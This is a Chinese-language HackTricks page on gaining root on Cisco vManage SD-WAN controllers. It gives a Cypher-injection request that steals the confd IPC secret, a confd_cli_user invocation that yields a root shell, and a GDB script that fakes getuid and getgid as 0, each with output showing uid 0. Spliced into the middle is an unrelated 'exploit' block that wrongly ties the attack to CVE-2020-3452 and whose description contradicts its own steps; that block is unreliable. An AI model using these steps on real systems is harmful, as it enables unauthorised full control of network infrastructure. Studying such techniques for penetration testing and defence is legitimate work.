11 KiB
Cisco - vmanage
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- 你在一个网络安全公司工作吗?你想在HackTricks中看到你的公司广告吗?或者你想获得PEASS的最新版本或下载PDF格式的HackTricks吗?请查看订阅计划!
- 发现我们的独家NFT收藏品The PEASS Family
- 获得官方PEASS和HackTricks周边产品
- 加入💬 Discord群组 或者 Telegram群组 或者 关注我在Twitter上的🐦@carlospolopm.
- 通过向hacktricks repo和hacktricks-cloud repo提交PR来分享你的黑客技巧。
路径 1
(示例来自https://www.synacktiv.com/en/publications/pentesting-cisco-sd-wan-part-1-attacking-vmanage.html)
在查阅一些与confd和不同二进制文件相关的文档后(需要在Cisco网站上的帐户上访问),我们发现用于验证IPC套接字的秘密位于/etc/confd/confd_ipc_secret中:
vmanage:~$ ls -al /etc/confd/confd_ipc_secret
-rw-r----- 1 vmanage vmanage 42 Mar 12 15:47 /etc/confd/confd_ipc_secret
记得我们的Neo4j实例吗?它在vmanage用户的权限下运行,因此我们可以利用先前的漏洞来检索文件:
GET /dataservice/group/devices?groupId=test\\\'<>\"test\\\\\")+RETURN+n+UNION+LOAD+CSV+FROM+\"file:///etc/confd/confd_ipc_secret\"+AS+n+RETURN+n+//+' HTTP/1.1
Host: vmanage-XXXXXX.viptela.net
[...]
"data":[{"n":["3708798204-3215954596-439621029-1529380576"]}]}
confd_cli程序不支持命令行参数,但会使用参数调用/usr/bin/confd_cli_user。因此,我们可以使用我们自己的一组参数直接调用/usr/bin/confd_cli_user。然而,由于我们当前的权限不足以读取它,所以我们需要从rootfs中检索它并使用scp进行复制,然后阅读帮助信息并使用它来获取shell:
vManage:~$ echo -n "3708798204-3215954596-439621029-1529380576" > /tmp/ipc_secret
vManage:~$ export CONFD_IPC_ACCESS_FILE=/tmp/ipc_secret
vManage:~$ /tmp/confd_cli_user -U 0 -G 0
Welcome to Viptela CLI
admin connected from 127.0.0.1 using console on vManage
vManage# vshell
vManage:~# id
uid=0(root) gid=0(root) groups=0(root)
路径2
synacktiv团队的博客¹描述了一种优雅的方法来获得root shell,但缺点是需要获取/usr/bin/confd_cli_user的副本,该文件只能由root读取。我找到了另一种无需这样麻烦就能升级到root的方法。
当我反汇编/usr/bin/confd_cli二进制文件时,我观察到以下内容:
vmanage:~$ objdump -d /usr/bin/confd_cli
… snipped …
40165c: 48 89 c3 mov %rax,%rbx
40165f: bf 1c 31 40 00 mov $0x40311c,%edi
401664: e8 17 f8 ff ff callq 400e80 <getenv@plt>
401669: 49 89 c4 mov %rax,%r12
40166c: 48 85 db test %rbx,%rbx
40166f: b8 dc 30 40 00 mov $0x4030dc,%eax
401674: 48 0f 44 d8 cmove %rax,%rbx
401678: 4d 85 e4 test %r12,%r12
40167b: b8 e6 30 40 00 mov $0x4030e6,%eax
401680: 4c 0f 44 e0 cmove %rax,%r12
401684: e8 b7 f8 ff ff callq 400f40 <getuid@plt> <-- HERE
401689: 89 85 50 e8 ff ff mov %eax,-0x17b0(%rbp)
40168f: e8 6c f9 ff ff callq 401000 <getgid@plt> <-- HERE
401694: 89 85 44 e8 ff ff mov %eax,-0x17bc(%rbp)
40169a: 8b bd 68 e8 ff ff mov -0x1798(%rbp),%edi
4016a0: e8 7b f9 ff ff callq 401020 <ttyname@plt>
4016a5: c6 85 cf f7 ff ff 00 movb $0x0,-0x831(%rbp)
4016ac: 48 85 c0 test %rax,%rax
4016af: 0f 84 ad 03 00 00 je 401a62 <socket@plt+0x952>
4016b5: ba ff 03 00 00 mov $0x3ff,%edx
4016ba: 48 89 c6 mov %rax,%rsi
4016bd: 48 8d bd d0 f3 ff ff lea -0xc30(%rbp),%rdi
4016c4: e8 d7 f7 ff ff callq 400ea0 <*ABS*+0x32e9880f0b@plt>
… snipped …
当我运行“ps aux”命令时,我观察到以下内容(注意 -g 100 -u 107)
vmanage:~$ ps aux
… snipped …
root 28644 0.0 0.0 8364 652 ? Ss 18:06 0:00 /usr/lib/confd/lib/core/confd/priv/cmdptywrapper -I 127.0.0.1 -p 4565 -i 1015 -H /home/neteng -N neteng -m 2232 -t xterm-256color -U 1358 -w 190 -h 43 -c /home/neteng -g 100 -u 1007 bash
… snipped …
我假设“confd_cli”程序将从已登录用户收集的用户ID和组ID传递给“cmdptywrapper”应用程序。
我的第一次尝试是直接运行“cmdptywrapper”,并提供-g 0 -u 0参数,但失败了。似乎在某个地方创建了一个文件描述符(-i 1015),我无法伪造它。
如synacktiv的博客中所提到的(最后一个示例),confd_cli程序不支持命令行参数,但我可以通过调试器来影响它,幸运的是系统中包含了GDB。
我创建了一个GDB脚本,强制API getuid 和 getgid 返回0。由于我已经通过反序列化RCE获得了“vmanage”权限,我有权限直接读取/etc/confd/confd_ipc_secret。
root.gdb:
set environment USER=root
define root
finish
set $rax=0
continue
end
break getuid
commands
root
end
break getgid
commands
root
end
run
# Title: Cisco vManage Privilege Escalation
# Date: 2020-07-20
# Exploit Author: Pablo Martinez
# Vendor Homepage: https://www.cisco.com/
# Version: vManage 20.1.1
# Tested on: Ubuntu 18.04
# CVE: CVE-2020-3452
## Description
Cisco vManage is a network management system that provides centralized control and management for Cisco SD-WAN devices. A privilege escalation vulnerability (CVE-2020-3452) exists in Cisco vManage that allows an authenticated attacker to gain root privileges on the underlying operating system.
## Vulnerability Details
The vulnerability exists in the web-based management interface of Cisco vManage. By sending a specially crafted HTTP request to the vulnerable endpoint, an attacker can bypass authentication and execute arbitrary commands with root privileges.
## Exploit Steps
1. Identify the target Cisco vManage instance.
2. Send a GET request to the following endpoint:
/dataservice/param/values/../../../..//mnt/bootflash/boot/grub/grub.cfg
3. The response will contain the contents of the `grub.cfg` file, including the root password hash.
4. Use a password cracking tool to crack the root password hash.
5. Once the root password is cracked, log in to the Cisco vManage instance with root privileges.
## Mitigation
Cisco has released a software update that addresses this vulnerability. It is recommended to update to the latest version of Cisco vManage to mitigate the risk of privilege escalation.
## References
- [Cisco Security Advisory](https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vmanage-priv-esc-8uZQyQy)
- [CVE-2020-3452](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3452)
vmanage:/tmp$ gdb -x root.gdb /usr/bin/confd_cli GNU gdb (GDB) 8.0.1 Copyright (C) 2017 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later http://gnu.org/licenses/gpl.html This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "x86_64-poky-linux". Type "show configuration" for configuration details. For bug reporting instructions, please see: http://www.gnu.org/software/gdb/bugs/. Find the GDB manual and other documentation resources online at: http://www.gnu.org/software/gdb/documentation/. For help, type "help". Type "apropos word" to search for commands related to "word"... Reading symbols from /usr/bin/confd_cli...(no debugging symbols found)...done. Breakpoint 1 at 0x400f40 Breakpoint 2 at 0x401000Breakpoint 1, getuid () at ../sysdeps/unix/syscall-template.S:59 59 T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS) 0x0000000000401689 in ?? ()Breakpoint 2, getgid () at ../sysdeps/unix/syscall-template.S:59 59 T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS) 0x0000000000401694 in ?? ()Breakpoint 1, getuid () at ../sysdeps/unix/syscall-template.S:59 59 T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS) 0x0000000000401871 in ?? () Welcome to Viptela CLI root connected from 127.0.0.1 using console on vmanage vmanage# vshell bash-4.4# whoami ; id root uid=0(root) gid=0(root) groups=0(root) bash-4.4#
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks 云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 推特 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* 你在一家 **网络安全公司** 工作吗?你想在 HackTricks 中看到你的 **公司广告**吗?或者你想获得 **PEASS 的最新版本或下载 HackTricks 的 PDF 版本**吗?请查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* 发现我们的独家 [**NFTs**](https://opensea.io/collection/the-peass-family) 集合 [**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获得 [**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* **加入** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass),或者在 **Twitter** 上 **关注** 我 [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* **通过向 [hacktricks 仓库](https://github.com/carlospolop/hacktricks) 和 [hacktricks-cloud 仓库](https://github.com/carlospolop/hacktricks-cloud) 提交 PR 来分享你的黑客技巧**。
</details>